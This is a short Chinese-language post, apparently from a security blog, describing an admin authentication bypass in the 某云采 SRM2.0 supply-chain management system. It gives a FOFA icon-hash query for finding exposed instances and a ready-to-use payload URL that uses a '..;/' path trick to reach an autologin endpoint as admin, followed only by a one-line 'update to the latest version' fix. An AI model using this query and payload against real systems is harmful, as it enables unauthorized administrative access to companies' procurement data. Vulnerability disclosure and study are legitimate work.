某云彩SRM2.0后台绕过漏洞

文章目录

    • 免责申明
    • 搜索语法
    • 漏洞描述
    • 漏洞复现
    • 修复建议

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin 

某云彩SRM2.0后台绕过漏洞_第1张图片

修复建议

更新到最新版本

你可能感兴趣的:(漏洞复现,漏洞)